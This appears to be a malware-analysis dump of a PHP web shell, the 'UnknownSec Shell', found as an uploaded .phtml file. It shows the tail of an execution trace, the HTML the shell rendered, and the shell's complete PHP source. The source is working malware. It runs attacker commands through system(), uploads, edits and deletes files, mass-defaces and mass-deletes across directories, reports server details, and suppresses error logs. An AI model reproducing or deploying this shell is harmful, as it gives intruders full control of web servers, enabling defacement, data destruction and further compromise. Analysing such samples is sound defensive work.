2 134 0 0.006346 529752 posix_getpwuid 0 /var/www/html/uploads/unknown45.phtml 584 1 1000
2 134 1 0.006376 530568
2 134 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 584 $fowner = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 585 $fowner = 'osboxes'
2 135 0 0.006431 529752 function_exists 0 /var/www/html/uploads/unknown45.phtml 589 1 'posix_getgrgid'
2 135 1 0.006444 529792
2 135 R TRUE
2 136 0 0.006457 529816 filegroup 0 /var/www/html/uploads/unknown45.phtml 590 1 '/var/www/html/uploads/unknown45.phtml'
2 136 1 0.006470 529856
2 136 R 1000
2 137 0 0.006483 529752 posix_getgrgid 0 /var/www/html/uploads/unknown45.phtml 590 1 1000
2 137 1 0.006514 530408
2 137 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/unknown45.phtml 590 $fgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/unknown45.phtml 591 $fgrp = 'osboxes'
2 138 0 0.006560 530072 filesize 0 /var/www/html/uploads/unknown45.phtml 599 1 'unknown45.phtml'
2 138 1 0.006575 530088
2 138 R 20716
2 139 0 0.006588 530048 sz 1 /var/www/html/uploads/unknown45.phtml 599 1 20716
2 A /var/www/html/uploads/unknown45.phtml 43 $sz = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2 A /var/www/html/uploads/unknown45.phtml 44 $i = 0
2 A /var/www/html/uploads/unknown45.phtml 44 $byt /= 1024
2 A /var/www/html/uploads/unknown45.phtml 44 $i++
3 140 0 0.006646 530048 round 0 /var/www/html/uploads/unknown45.phtml 45 2 20.23046875 2
3 140 1 0.006660 530120
3 140 R 20.23
2 139 1 0.006675 530088
2 139 R '20.23 KB'
2 141 0 0.006689 529792 is_writable 0 /var/www/html/uploads/unknown45.phtml 602 1 '/var/www/html/uploads/unknown45.phtml'
2 141 1 0.006706 529832
2 141 R FALSE
2 142 0 0.006719 529792 is_readable 0 /var/www/html/uploads/unknown45.phtml 603 1 '/var/www/html/uploads/unknown45.phtml'
2 142 1 0.006735 529832
2 142 R TRUE
2 143 0 0.006749 529792 p 1 /var/www/html/uploads/unknown45.phtml 604 1 '/var/www/html/uploads/unknown45.phtml'
3 144 0 0.006761 529792 fileperms 0 /var/www/html/uploads/unknown45.phtml 66 1 '/var/www/html/uploads/unknown45.phtml'
3 144 1 0.006776 529856
3 144 R 33204
2 A /var/www/html/uploads/unknown45.phtml 66 $p = 33204
2 A /var/www/html/uploads/unknown45.phtml 67 $i = 'u'
2 A /var/www/html/uploads/unknown45.phtml 70 $i = '-'
2 A /var/www/html/uploads/unknown45.phtml 75 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 76 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 77 $i .= '-'
2 A /var/www/html/uploads/unknown45.phtml 78 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 79 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 80 $i .= '-'
2 A /var/www/html/uploads/unknown45.phtml 81 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 82 $i .= '-'
2 A /var/www/html/uploads/unknown45.phtml 83 $i .= '-'
2 143 1 0.006904 529856
2 143 R '-rw-rw-r--'
2 145 0 0.006919 529816 is_writable 0 /var/www/html/uploads/unknown45.phtml 605 1 '/var/www/html/uploads/unknown45.phtml'
2 145 1 0.006939 529856
2 145 R FALSE
2 146 0 0.006953 529816 is_readable 0 /var/www/html/uploads/unknown45.phtml 605 1 '/var/www/html/uploads/unknown45.phtml'
2 146 1 0.006968 529856
2 146 R TRUE
2 147 0 0.006982 529752 date 0 /var/www/html/uploads/unknown45.phtml 626 1 'Y'
2 147 1 0.006997 530040
2 147 R '2023'
1 3 1 0.007013 529752
0.007061 353160
TRACE END [2023-02-12 21:23:21.971105]
Generated HTML code
<html><head>
<meta name="author" content="UnknownSec">
<meta name="robots" content="noindex,nofollow">
<title>localhost - UnknownSec</title>
<meta name="viewport" content="width=device-width, initial-scale=0.70">
<link rel="stylesheet" href="//random-php.ftp.sh/style.css">
<script src="//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js"></script>
<script src="//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js"></script>
<script src="//code.jquery.com/jquery-3.3.1.slim.min.js"></script>
<style>
.shell {
border-radius: 4px;
border: 1px solid rgba(255, 255, 255, 0.4);
font-size: 10pt;
display: flex;
flex-direction: column;
align-items: stretch;
background: #242424;
color: #fff;
}
.pre {
height: 150px;
overflow: auto;
white-space: pre-wrap;
flex-grow: 1;
}
</style></head>
<body class="bg-secondary text-light">
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-dark p-4 rounded-3">
<div class="corner text-secondary">shell bypass 403</div>
<a class="text-decoration-none text-light" href="/unknown45.phtml"><h4>UnknownSec Shell</h4></a><div class="table-responsive"><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a><a class="text-decoration-none" href="?path=/var">var</a>/<a class="text-decoration-none" href="?path=/var/www">www</a>/<a class="text-decoration-none" href="?path=/var/www/html">html</a>/ [ <font color="green">drwxrwxrwx</font> ]</div>
</div>
</div>
</div>
<div class="container-fluid">
<div class="box shadow bg-dark p-4 rounded-3">
<div class="text-center">
<a class="btn btn-outline-light btn-sm" href="?id=upload&path=/var/www/html"><i class="bi bi-upload"></i> upload</a>
<a class="btn btn-outline-light btn-sm" href="?id=deface&path=/var/www/html"><i class="bi bi-exclamation-diamond"></i> mass deface</a>
<a class="btn btn-outline-light btn-sm" href="?id=delete&path=/var/www/html"><i class="bi bi-trash"></i> mass delete</a>
<a class="btn btn-outline-light btn-sm" href="?id=cmd&path=/var/www/html"><i class="bi bi-terminal"></i> console</a>
<a class="btn btn-outline-light btn-sm" href="?id=info&path=/var/www/html"><i class="bi bi-info-circle"></i> info server</a>
</div><div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">name</td>
<td class="text-center">last edit</td>
<td class="text-center">size</td>
<td class="text-center">owner<gr>:</gr>downer</td>
<td class="text-center">permission</td>
<td class="text-center">options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=/var/www">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?id=filebaru&path=/var/www/html"><i class="bi bi-file-earmark-plus-fill"></i></a>
<a class="btn btn-outline-light btn-sm" href="?id=dirbaru&path=/var/www/html"><i class="bi bi-folder-plus"></i></a>
</div>
</td>
</tr>
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td class="text-center">2023-02-13 06:22:48</td>
<td class="text-center">0 B</td>
<td class="text-center">root<gr>:</gr>root</td>
<td class="text-center">-rw-r--r--
</td><td class="text-center">
<form method="POST" action="?option&path=/var/www/html">
<div class="btn-group">
<button class="btn btn-outline-light btn-sm" name="opt" value="edit"><i class="bi bi-pencil-square"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="rename"><i class="bi bi-pencil-fill"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="download"><i class="bi bi-download"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="delete"><i class="bi bi-trash-fill"></i></button>
</div>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
</form>
</td>
</tr>
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/unknown45.phtml&path=/var/www/html">unknown45.phtml</a></td>
<td class="text-center">2023-02-13 06:22:48</td>
<td class="text-center">20.23 KB</td>
<td class="text-center">osboxes<gr>:</gr>osboxes</td>
<td class="text-center">-rw-rw-r--
</td><td class="text-center">
<form method="POST" action="?option&path=/var/www/html">
<div class="btn-group">
<button class="btn btn-outline-light btn-sm" name="opt" value="edit"><i class="bi bi-pencil-square"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="rename"><i class="bi bi-pencil-fill"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="download"><i class="bi bi-download"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="delete"><i class="bi bi-trash-fill"></i></button>
</div>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="unknown45.phtml">
<input type="hidden" name="path" value="/var/www/html/unknown45.phtml">
</form>
</td>
</tr>
</tbody>
</table>
<div class="text-secondary">© 2023 UnknownSec</div>
</div>
</div>
</div></body></html>Original PHP code
<?php
/* Mau recode? izin dulu, recode ga izin itu ga keren ajg */
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
date_default_timezone_set('Asia/Jakarta');
$_n = 'UnknownSec';
$_s = "<style>table{display:none;}</style><div class='table-responsive'><hr></div>";
$_r = "required='required'";
$_x = "<i class='bi bi-gear-fill'></i>";
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
function ▟($dir,$p) {
if(isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if(is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function ok(){
echo '<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function fail(){
echo '<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function sz($byt){
$sz = array('B', 'KB', 'MB', 'GB', 'TB');
for($i = 0; $byt >= 1024 && $i < (count($sz) -1 ); $byt /= 1024, $i++ );
return(round($byt,2)." ".$sz[$i]);
}
function ip() {
$ipas = '';
if(getenv('HTTP_CLIENT_IP'))
$ipas = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
$ipas = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
$ipas = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
$ipas = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
$ipas = getenv('REMOTE_ADDR');
else
$ipas = 'IP tidak dikenali';
return $ipas;
}
function p($file){
if($p = @fileperms($file)){
$i = 'u';
if(($p & 0xC000) == 0xC000)$i = 's';
elseif(($p & 0xA000) == 0xA000)$i = 'l';
elseif(($p & 0x8000) == 0x8000)$i = '-';
elseif(($p & 0x6000) == 0x6000)$i = 'b';
elseif(($p & 0x4000) == 0x4000)$i = 'd';
elseif(($p & 0x2000) == 0x2000)$i = 'c';
elseif(($p & 0x1000) == 0x1000)$i = 'p';
$i .= ($p & 00400)? 'r':'-';
$i .= ($p & 00200)? 'w':'-';
$i .= ($p & 00100)? 'x':'-';
$i .= ($p & 00040)? 'r':'-';
$i .= ($p & 00020)? 'w':'-';
$i .= ($p & 00010)? 'x':'-';
$i .= ($p & 00004)? 'r':'-';
$i .= ($p & 00002)? 'w':'-';
$i .= ($p & 00001)? 'x':'-';
return $i;
}
else return "- ?? -";
}
echo "
<!DOCTYPE HTML>
<html>
<head>
<meta name='author' content='$_n'>
<meta name='robots' content='noindex,nofollow'>
<title>".$_SERVER['HTTP_HOST']." - $_n</title>
<meta name='viewport' content='width=device-width, initial-scale=0.70'>
<link rel='stylesheet' href='//random-php.ftp.sh/style.css'>
<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>
<script src='//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js'></script>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
</head>
<style>
.shell {
border-radius: 4px;
border: 1px solid rgba(255, 255, 255, 0.4);
font-size: 10pt;
display: flex;
flex-direction: column;
align-items: stretch;
background: #242424;
color: #fff;
}
.pre {
height: 150px;
overflow: auto;
white-space: pre-wrap;
flex-grow: 1;
}
</style>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
<div class='box shadow bg-dark p-4 rounded-3'>
<div class='corner text-secondary'>shell bypass 403</div>
<a class='text-decoration-none text-light' href='".$_SERVER['PHP_SELF']."'><h4>$_n Shell</h4></a>";
if(isset($_GET['path'])){
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<div class="table-responsive"><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a class="text-decoration-none" href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo " [ ".▟($path, p($path))." ]</div>";
echo "
</div>
</div>
</div>
<div class='container-fluid'>
<div class='box shadow bg-dark p-4 rounded-3'>
<div class='text-center'>
<a class='btn btn-outline-light btn-sm' href='?id=upload&path=$path'><i class='bi bi-upload'></i> upload</a>
<a class='btn btn-outline-light btn-sm' href='?id=deface&path=$path'><i class='bi bi-exclamation-diamond'></i> mass deface</a>
<a class='btn btn-outline-light btn-sm' href='?id=delete&path=$path'><i class='bi bi-trash'></i> mass delete</a>
<a class='btn btn-outline-light btn-sm' href='?id=cmd&path=$path'><i class='bi bi-terminal'></i> console</a>
<a class='btn btn-outline-light btn-sm' href='?id=info&path=$path'><i class='bi bi-info-circle'></i> info server</a>
</div>";
// tools nya
if(isset($_GET['path'])) {
$dir = $_GET['path'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
for($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if($i != $c_dir) {
} elseif($_GET['id'] == 'deface'){
function mass_kabeh($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<gr>success</gr>] $▚<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function mass_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<gr>success</gr>] $dirb/$namafile<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "$_s
<div class='card text-dark'>
<div class='card-header'>
<form method='POST'>
<kbd>$_x Mass deface</kbd>
<br>Tipe:<br>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>
<label class='custom-control-label' for='customSwitch'>Biasa</label>
</div>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>
<label class='custom-control-label' for='customSwitch1'>Massal</label>
</div>
<i class='bi bi-folder'></i> Lokasi:
<input class='form-control btn-sm' type='text' name='d_dir' value='$dir'>
<i class='bi bi-file-earmark'></i> Nama file:
<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' $_r>
<i class='bi bi-file-earmark'></i> Isi file:
<textarea class='form-control btn-sm' rows='7' name='script' placeholder='isi file' $_r></textarea>
<input class='btn btn-dark btn-sm btn-block' type='submit' name='start' value='mass deface'>
</form>
</div>
</div>
<br>";
}
} elseif($_GET['id'] == 'cmd'){
if($_POST['ekseCMD']) {
$cmd = $_POST['ekseCMD'];
}
echo "$_s
<div class='card text-dark'>
<div class='card-header'>
<kbd>$_x Console</kbd>
<div class='container-fluid language-javascript'>
<pre style='font-size:10px;'><gr>~</gr>$ <rd>$cmd</rd><br><code>"; system($_POST['ekseCMD'].' 2>&1'); echo "</code></pre>
</div>
<form method='POST'>
<div class='input-group mb-3'>
<input class='form-control btn-sm' type='text' name='ekseCMD' value='$cmd' placeholder='whoami' $_r>
<button class='btn btn-dark btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>
</div>
</div>
<br>";
} elseif($_GET['id'] == 'info'){
$disfunc = @ini_get("disable_functions");
if(empty($disfunc)) {
$disfc = "<gr>NONE</gr>";
} else {
$disfc = "<rd>$disfunc</rd>";
}
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<rd>ON</rd>" : "<gr>OFF</gr>";
echo "$_s
<div class='card text-dark'>
<div class='card-header'>
<kbd>$_x Info server</kbd>
<br>
Uname: <gr>".php_uname()."</gr><br />
Software: <gr>".$_SERVER['SERVER_SOFTWARE']."</gr><br />
PHP version: <gr>".PHP_VERSION."</gr> <a class='text-decoration-none' href='?id=phpinfo&path=$path'>[ PHP INFO ]</a> PHP os: <gr>".PHP_OS."</gr><br />
Server Ip: <gr>".gethostbyname($_SERVER['HTTP_HOST'])."</gr><br />
Your Ip: <gr>".ip()."</gr><br />
User: <gr>$user</gr> ($uid) | Group: <gr>$group</gr> ($gid)<br />
Safe Mode: $sm<br />
<kbd>Disable Function:</kbd><pre>$disfc</pre>
</div>
</div>
<br>";
} elseif($_GET['id'] == 'phpinfo'){
@ob_start();
@eval("phpinfo();");
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff,"<body>")+6;
$akhir = strpos($buff,"</body>");
echo "<pre class='php_info'>".substr($buff,$awal,$akhir-$awal)."</pre>";
exit;
} elseif($_GET['id'] == 'upload'){
echo "$_s
<div class='card text-dark'>
<div class='card-header'>";
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<strong>Upload</strong> ok! '.ok().'</div>';
} else {
echo '<strong>Upload</strong> fail! '.fail().'</div>';
}
}
echo "
<form method='POST' enctype='multipart/form-data'>
<kbd>$_x Upload File</kbd>
<div class='input-group mb-3'>
<input type='file' class='form-control form-control-sm' name='file' $_r>
<button type='submit' class='btn btn-dark btn-sm'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>
</div>
</div>
<br>";
} elseif($_GET['id'] == 'filebaru') {
if(isset($_POST['bikin'])){
$name = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
foreach ($name as $nama_file){
$handle = @fopen("$nama_file", "w");
if($isi_file){
$buat = @fwrite($handle, $isi_file);
}else{
$buat = $handle;
}
}
if($buat){
echo '<strong>Buat file</strong> ok! '.ok().'</div>';
}else{
echo '<strong>Buat file</strong> fail! '.fail().'</div>';
}
}
echo "$_s
<div class='card text-dark'>
<div class='card-header'>
<kbd>$_x Buat file</kbd>
<form method='POST'>
<i class='bi bi-file-earmark'></i> Nama file:
<input type='text' class='form-control form-control-sm' name='nama_file[]' placeholder='Nama file' $_r>
<i class='bi bi-file-earmark'></i> Isi file:
<textarea name='isi_file' class='form-control form-control-sm' rows='7' placeholder='Isi file' $_r ></textarea>
<input type='submit' class='btn btn-dark btn-sm btn-block' name='bikin' value='buat'>
</form>
</div>
</div>
<br>";
} elseif($_GET['id'] == 'dirbaru'){
if(isset($_POST['buat'])){
$nama = $_POST['nama_folder'];
foreach ($nama as $nama_folder){
$folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder);
$fd = @mkdir ($folder);
}
if($fd){
echo '<strong>Buat dir</strong> ok! '.ok().'</div>';
}else{
echo '<strong>Buat dir</strong> fail! '.fail().'</div>';
}
}
echo "$_s
<div class='card text-dark'>
<div class='card-header'>
<kbd>$_x Buat dir</kbd>
<form method='POST'>
<i class='bi bi-folder'></i> Nama dir:
<div class='input-group mb-3'>
<input type='text' class='form-control form-control-sm' name='nama_folder[]' placeholder='Nama dir' $_r>
<input type='submit' class='btn btn-dark btn-sm' name='buat' value='buat'>
</div>
</form>
</div>
</div>
<br>";
} elseif($_GET['id'] == 'delete'){
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($▚)) {
echo "[<gr>deleted</gr>] $▚<br>";
unlink($▚);
$▟ = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "$_s
<div class='card text-dark'>
<div class='card-header'>
<form method='POST'>
<kbd>$_x Mass delete</kbd>
<br>
<i class='bi bi-folder'></i> Lokasi:
<input class='form-control btn-sm' type='text' name='d_dir' value='$dir'>
<i class='bi bi-file-earmark'></i> Nama file:
<div class='input-group mb-3'>
<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' $_r><br>
<div class='input-group-append'>
<input class='btn btn-dark btn-sm' type='submit' name='start' value='mass delete'>
</div>
</form>
</div>
</div>
</div>
<br>";
}
}
}
// akhir tools
if(isset($_GET['filesrc'])){
echo "<br><b>name : </b>".basename($_GET['filesrc']);"</br>";
echo '<div class="shell pre"><pre style="font-size:10px;">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre></div><br/>';
} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '<br><b>name : </b>'.basename($_POST['path']);'</br>';
//rename file
if($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<strong>Rename</strong> ok! '.ok().'</div>';
} else {
echo '<strong>Rename</strong> fail! '.fail().'</div>';
}
$_POST['name'] = $_POST['newname'];
}
echo '
<form method="POST">
<div class="input-group mb-3">
<input class="form-control form-control-sm" name="newname" type="text" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input class="btn btn-outline-light btn-sm" type="submit" value="rename"/>
</div>
</form>';
} elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<strong>Edit</strong> ok! '.ok().'</div>';
} else {
echo '<strong>Edit</strong> fail! '.fail().'</div>';
}
fclose($fp);
}
echo '
<form method="POST">
<textarea class="form-control form-control-sm" rows="7" name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light btn-sm btn-block" type="submit" value="edit"/>
</form>
<br>';
}
} else {
//delete dir & file
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<strong>Delete dir</strong> ok! '.ok().'</div>';
} else {
echo '<strong>Delete dir</strong> fail! '.fail().'</div>';
}
} elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<strong>Delete file</strong> ok! '.ok().'</div>';
} else {
echo '<strong>Delete file</strong> fail! '.fail().'</div>';
}
}
}
$scandir = scandir($path);
$pa = getcwd();
echo '<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">name</td>
<td class="text-center">last edit</td>
<td class="text-center">size</td>
<td class="text-center">owner<gr>:</gr>downer</td>
<td class="text-center">permission</td>
<td class="text-center">options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path='.dirname($dir).'">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?id=filebaru&path='.$dir.'"><i class="bi bi-file-earmark-plus-fill"></i></a>
<a class="btn btn-outline-light btn-sm" href="?id=dirbaru&path='.$dir.'"><i class="bi bi-folder-plus"></i></a>
</div>
</td>
</tr>';
foreach($scandir as $dir){
$dt = date("Y-m-d H:i:s", filemtime("$path/$dir"));
if(function_exists('posix_getpwuid')) {
$downer = @posix_getpwuid(fileowner("$path/$dir"));
$downer = $downer['name'];
} else {
$downer = fileowner("$path/$dir");
}
if(function_exists('posix_getgrgid')) {
$dgrp = @posix_getgrgid(filegroup("$path/$dir"));
$dgrp = $dgrp['name'];
} else {
$dgrp = filegroup("$path/$dir");
}
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "
<tr>
<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path=$path/$dir\">$dir</a></td>
<td class='text-center'>$dt</td>
<td class='text-center'>dir</td>
<td class='text-center'>$downer<gr>:</gr>$dgrp</td>
<td class='text-center'>";
if(is_writable("$path/$dir")) echo '<gr>';
elseif(!is_readable("$path/$dir")) echo '<rd>';
echo p("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</gr></rd></td>';
echo "
<td class=\"text-center\">
<form method=\"POST\" action=\"?option&path=$path\">
<div class=\"btn-group\">
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"rename\"><i class='bi bi-pencil-fill'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"delete\"><i class='bi bi-trash-fill'></i></button>
</div>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
</form>
</td>
</tr>";
}
foreach($scandir as $file){
$ft = date("Y-m-d H:i:s", filemtime("$path/$file"));
if(!is_file($path.'/'.$file)) continue;
if(function_exists('posix_getpwuid')) {
$fowner = @posix_getpwuid(fileowner("$path/$file"));
$fowner = $fowner['name'];
} else {
$fowner = fileowner("$path/$file");
}
if(function_exists('posix_getgrgid')) {
$fgrp = @posix_getgrgid(filegroup("$path/$file"));
$fgrp = $fgrp['name'];
} else {
$fgrp = filegroup("$path/$file");
}
echo "
<tr>
<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td class='text-center'>$ft</td>
<td class='text-center'>".sz(filesize($file))."</td>
<td class='text-center'>$fowner<gr>:</gr>$fgrp</td>
<td class='text-center'>";
if(is_writable("$path/$file")) echo '<gr>';
elseif(!is_readable("$path/$file")) echo '<rd>';
echo p("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</gr></rd></td>';
echo "
<td class=\"text-center\">
<form method=\"POST\" action=\"?option&path=$path\">
<div class=\"btn-group\">
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"edit\"><i class='bi bi-pencil-square'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"rename\"><i class='bi bi-pencil-fill'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"download\"><i class='bi bi-download'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"delete\"><i class='bi bi-trash-fill'></i></button>
</div>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
</form>
</td>
</tr>";
}
}
echo "
</tbody>
</table>
<div class='text-secondary'>© ".date("Y")." $_n</div>
</div>
</div>
</body>
</html>";
?>